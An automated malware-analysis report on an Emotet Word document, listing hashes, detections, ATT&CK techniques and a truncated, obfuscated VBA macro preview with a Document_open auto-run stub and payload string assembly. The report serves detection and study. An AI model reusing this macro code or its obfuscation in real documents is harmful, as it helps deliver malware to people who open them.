Emotet Office (OLE) malware analysis — malicious · 794320090de98510

MALICIOUS

Office (OLE)

247.6 KB Created: 2020-01-16 19:41:00 Authoring application: Microsoft Office Word First seen: 2020-05-25

MD5: 0957a6bc89ead400b22ba61af73a58d8 SHA-1: 1df35316836cb60e07ef88d08cc96de50b340f4f SHA-256: 794320090de985103e3c7a37d2e529cc41fa3df9f2e07be89cdb5523e9018ab9

202 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-7543223-0', strongly suggesting the Emotet family. The presence of a Document_Open VBA macro indicates an attempt to automatically execute malicious code upon opening the document. This macro likely facilitates the download and execution of a secondary payload, a common Emotet tactic.

Heuristics 6

ClamAV: Doc.Downloader.Emotet-7543223-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-7543223-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11312 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11312 bytes
SHA-256: `28c5af35284c8d00231ca3b3ecf6285bedc33485a2946e154a9617c022fa1ae8`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Mkogkihsdbaz" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() Cbmgjvguo End Sub Attribute VB_Name = "Wfxxsret" Attribute VB_Base = "0{689FBB8D-9D2F-44F5-A8F6-3E8196D7914A}{28AAC8F4-CCE3-4E61-A822-40D7067799DF}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Zpbptpwy" Function Lvqafoet() Do While Jqddglyic = 900 Do While Aphlylca = 3 + 2 Uribmlse = Chr(4) Iarckqsbwnyj = Sqr(9) + Bvvrtrduq Zubtafdrcsa = CLng(Bhtbesel) Arqblspn = Int(1 + 1) Okwrhvhvrmn = CDate(QKoWc) Qqlybqxydwrbc = 9 + Int(4) Loop Do While Symeqjpql = 2 + 4 Iljtppyuzlzt = CLng(Mqlofpeldcsai) Azawhimojgb = Int(1 + 4) Lssfyhdte = 2 + Int(3) Mpxigaphm = Chr(6) Lzwgoabbhdnxa = Sqr(7) + Nbbhtwxtks Iirupamh = CDate(QKoWc) Loop Loop Lzwqhezwzla = ChrW(wdKeyP) Do While Nppgwmvm = 900 Do While Jcjftwbi = 3 + 2 Keelgoyqkzciz = Chr(4) Zstnrxpmhkd = Sqr(9) + Delalppjkeaio Jabcnote = CLng(Hbusxacpzmgo) Kggpnsfdrnchj = Int(1 + 1) Kkzcfenurn = CDate(QKoWc) Sotvvyfrgheqp = 9 + Int(4) Loop Do While Jhqprbeoc = 2 + 4 Wswlpcjvmo = CLng(Gjdjedgjnqzd) Xmvoaqpj = Int(1 + 4) Uvrbgucplqj = 2 + Int(3) Szlvxygstyo = Chr(6) Zyohbxhqojlec = Sqr(7) + Jswsqzdopvs Ubwdwjuebdolz = CDate(QKoWc) Loop Loop Vukgbsnnzi = Lzwqhezwzla + Wfxxsret.Trgjknfy + Wfxxsret.Ckzxsvyp Do While Fillrazgzm = 900 Do While Dgccgvxtwyrjo = 3 + 2 Ksakshtufpg = Chr(4) Kvhywookwsr = Sqr(9) + Qohqbwojpo Mqklwmaj = CLng(Bqtnaogoz) Gremoojxhvhi = Int(1 + 1) Yeyzfrfgin = CDate(QKoWc) Nwadboqggygyh = 9 + Int(4) Loop Do While Mzmuixebkio = 2 + 4 Pajqwramweu = CLng(Pczxzsgbtgvt) Juqumtzqgppcp = Int(1 + 4) Pvrbqhbb = 2 + Int(3) Woqwtnworr = Chr(6) Jhzszwkix = Sqr(7) + Xdldsrshs Qeiunbtnxh = CDate(QKoWc) Loop Loop Fack = Wfxxsret.Ndheetroisal.Tag Pucjiaykdqvhk = Split(Vukgbsnnzi + LTrim(LTrim(Fack)), "9_msnnj883hn///") Do While Xtcdrargdamm = 900 Do While Gfetlwiqjd = 3 + 2 Boinogoz = Chr(4) Btqplidglvqc = Sqr(9) + Eeqclgkyfq Xplgxaan = CLng(Cvlzndrcky) Ijpmocjdnaqil = Int(1 + 1) Fxqbhfuburls = CDate(QKoWc) Dgzjxgbrl = 9 + Int(4) Loop Do While Dawcfcoaimeuw = 2 + 4 Ohuudjcxktrz = CLng(Toledefxz) Wsytymcxest = Int(1 + 4) Hobdmindaup = 2 + Int(3) Pthnqifggred = Chr(6) Objnzsuxp = Sqr(7) + Lrbkvxjw Jpqblrlbwxzba = CDate(QKoWc) Loop Loop Lvqafoet = Cnxubhvfs + Join(Pucjiaykdqvhk, "") + Cnxubhvfs Do While Tfpdjnajsfx = 900 Do While Qitmvatndj = 3 + 2 Bxjsolej = Chr(4) Qvuziartbelfh = Sqr(9) + Orpzzpwod Rqdtsgtusxr = CLng(Svjivowqllau) Rguhqrtjap = Int(1 + 1) Fmnfjxvyge = CDate(QKoWc) Splzfedzdwb = 9 + Int(4) Loop Do While Qaeyjvuzjijcg = 2 + 4 Yqcnbgob = CLng(Evlijikzhtwr) Ilnjgbwycaamt = Int(1 + 4) Rczyefziqa = 2 + Int(3) Cyjghqfepseue = Chr(6) Tliwpwnqr = Sqr(7) + Vrjcx ... (truncated)

SHA-256: 28c5af35284c8d00231ca3b3ecf6285bedc33485a2946e154a9617c022fa1ae8

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Mkogkihsdbaz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Cbmgjvguo
End Sub

Attribute VB_Name = "Wfxxsret"
Attribute VB_Base = "0{689FBB8D-9D2F-44F5-A8F6-3E8196D7914A}{28AAC8F4-CCE3-4E61-A822-40D7067799DF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Zpbptpwy"
Function Lvqafoet()
   Do While Jqddglyic = 900
            Do While Aphlylca = 3 + 2
            Uribmlse = Chr(4)
            Iarckqsbwnyj = Sqr(9) + Bvvrtrduq
            Zubtafdrcsa = CLng(Bhtbesel)
            Arqblspn = Int(1 + 1)
            Okwrhvhvrmn = CDate(QKoWc)
            Qqlybqxydwrbc = 9 + Int(4)
            Loop
            Do While Symeqjpql = 2 + 4
            Iljtppyuzlzt = CLng(Mqlofpeldcsai)
            Azawhimojgb = Int(1 + 4)
            Lssfyhdte = 2 + Int(3)
            Mpxigaphm = Chr(6)
            Lzwgoabbhdnxa = Sqr(7) + Nbbhtwxtks
            Iirupamh = CDate(QKoWc)
            Loop
Loop
Lzwqhezwzla = ChrW(wdKeyP)
   Do While Nppgwmvm = 900
            Do While Jcjftwbi = 3 + 2
            Keelgoyqkzciz = Chr(4)
            Zstnrxpmhkd = Sqr(9) + Delalppjkeaio
            Jabcnote = CLng(Hbusxacpzmgo)
            Kggpnsfdrnchj = Int(1 + 1)
            Kkzcfenurn = CDate(QKoWc)
            Sotvvyfrgheqp = 9 + Int(4)
            Loop
            Do While Jhqprbeoc = 2 + 4
            Wswlpcjvmo = CLng(Gjdjedgjnqzd)
            Xmvoaqpj = Int(1 + 4)
            Uvrbgucplqj = 2 + Int(3)
            Szlvxygstyo = Chr(6)
            Zyohbxhqojlec = Sqr(7) + Jswsqzdopvs
            Ubwdwjuebdolz = CDate(QKoWc)
            Loop
Loop
Vukgbsnnzi = Lzwqhezwzla + Wfxxsret.Trgjknfy + Wfxxsret.Ckzxsvyp
   Do While Fillrazgzm = 900
            Do While Dgccgvxtwyrjo = 3 + 2
            Ksakshtufpg = Chr(4)
            Kvhywookwsr = Sqr(9) + Qohqbwojpo
            Mqklwmaj = CLng(Bqtnaogoz)
            Gremoojxhvhi = Int(1 + 1)
            Yeyzfrfgin = CDate(QKoWc)
            Nwadboqggygyh = 9 + Int(4)
            Loop
            Do While Mzmuixebkio = 2 + 4
            Pajqwramweu = CLng(Pczxzsgbtgvt)
            Juqumtzqgppcp = Int(1 + 4)
            Pvrbqhbb = 2 + Int(3)
            Woqwtnworr = Chr(6)
            Jhzszwkix = Sqr(7) + Xdldsrshs
            Qeiunbtnxh = CDate(QKoWc)
            Loop
Loop
Fack = Wfxxsret.Ndheetroisal.Tag
Pucjiaykdqvhk = Split(Vukgbsnnzi + LTrim(LTrim(Fack)), "9_msnnj883hn///")
   Do While Xtcdrargdamm = 900
            Do While Gfetlwiqjd = 3 + 2
            Boinogoz = Chr(4)
            Btqplidglvqc = Sqr(9) + Eeqclgkyfq
            Xplgxaan = CLng(Cvlzndrcky)
            Ijpmocjdnaqil = Int(1 + 1)
            Fxqbhfuburls = CDate(QKoWc)
            Dgzjxgbrl = 9 + Int(4)
            Loop
            Do While Dawcfcoaimeuw = 2 + 4
            Ohuudjcxktrz = CLng(Toledefxz)
            Wsytymcxest = Int(1 + 4)
            Hobdmindaup = 2 + Int(3)
            Pthnqifggred = Chr(6)
            Objnzsuxp = Sqr(7) + Lrbkvxjw
            Jpqblrlbwxzba = CDate(QKoWc)
            Loop
Loop
Lvqafoet = Cnxubhvfs + Join(Pucjiaykdqvhk, "") + Cnxubhvfs
   Do While Tfpdjnajsfx = 900
            Do While Qitmvatndj = 3 + 2
            Bxjsolej = Chr(4)
            Qvuziartbelfh = Sqr(9) + Orpzzpwod
            Rqdtsgtusxr = CLng(Svjivowqllau)
            Rguhqrtjap = Int(1 + 1)
            Fmnfjxvyge = CDate(QKoWc)
            Splzfedzdwb = 9 + Int(4)
            Loop
            Do While Qaeyjvuzjijcg = 2 + 4
            Yqcnbgob = CLng(Evlijikzhtwr)
            Ilnjgbwycaamt = Int(1 + 4)
            Rczyefziqa = 2 + Int(3)
            Cyjghqfepseue = Chr(6)
            Tliwpwnqr = Sqr(7) + Vrjcx
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.